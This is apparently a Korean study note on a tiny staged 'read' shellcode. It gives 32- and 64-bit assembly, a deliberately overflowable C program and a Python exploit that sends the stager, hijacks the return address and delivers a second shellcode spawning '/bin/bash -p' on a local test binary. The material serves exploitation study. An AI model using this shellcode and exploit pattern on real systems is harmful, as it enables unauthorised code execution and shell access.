쉘코드 수신 쉘코드

.global main

main:

cdq

mul %edx

push %edx

pop %ebx

movb $0xff,%dl

addb $0x3,%al

push %esp

pop %ecx

int $0x80

jmp *%ecx

위는 32비트전용 아래는 64비트 전용

.global main

main:

cdq

mul %rdx

push %rdx

pop %rdi

movb $0xff,%dl

push %rsp

pop %rsi

syscall

jmp *%rsi

cdq; mul %edx 이 구문을 이용하면 32비트일때 \x99\xf7\xe2 3바이트로 eax와 edx 둘을 0으로 초기화 시킬 수 있다. 64비트일때는 한바이트가 더 들어간다.

가끔 cdq가 안먹힐 때가 있는데, cdq를 빼고 xor %edx,%edx 넣어 16바이트 로 쓸 수도 있다.

이 쉘코드가 실행되면 read(0,buf,0xff)가 수행되고 buf로 jmp 하게된다. 

(디스크립터 부분을 변경하고 싶다면 %ebx를 변경시켜야한다.)

총 바이트 수가 15바이트(64비트는 14바이트)이므로 쉘코드를 쓸 수 있지만 버퍼 공간이 터무니 없이 작을 때, 사용이 가능하다.

#include<stdio.h>

char g[16];

int main()

{

char l[4];

read(0,g,24);

strcpy(l,g);

}

이런 소스의 바이너리가 있다고 치자.

이 바이너리는 우분투 14.04 32비트 기준으로 16 + 4(Return Address) 의 버퍼구조를 갖는다. 스택쿠키를 끄고 메모리에 실행권한을 준다.

16바이트는 쉘코드 공간으로 좀 부족하다. 이럴 때 쉘코드 수신 쉘코드를 쓴다.

#!/usr/bin/python

from socket import *

from struct import pack

import telnetlib

p = lambda x :pack("<L",x)

host = "localhost"

port = 7141

shellcode1 = "\x31\xd2\xf7\xe2\x52\x5b\xb2\xff\x04\x03\x54\x59\xcd\x80\xff\xe1"

shellcode2 = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

g = 0x804a025

s = create_connection((host,port))

payload = ""

payload += shellcode1

payload += p(g)

raw_input()

s.send(payload + "\n")

s.send(shellcode2)

t = telnetlib.Telnet(host,port)

t.sock = s

t.interact()

테스트해보니 이상하게 cdq 구문이 먹히지 않았다. 그래서 cdq를 xor edx, edx로 바꾸고 넣어줬다. 

shellcode2는 쉘을 실행시키는 코드이다. 이런식으로 버퍼크기가 작을 때 사용할 수 있다.

* 2016_07_29 : cdq는 부호확장으로 eax가 음수면 edx가 0xffffffff가 된댄다.

그리고 gcc 컴파일할 때 -nostdlib 하면 main으로 엔트리 포인트 안바뀜

진모랑 오늘 이것저것 얘기하면서 쉘코드 줄여달라고 얘기했는데 짱많이 줄여줌 헤헤

xor ebx, ebx
mul ebx
mov al, 3
mov ecx, esp
dec edx
int 0x80
jmp ecx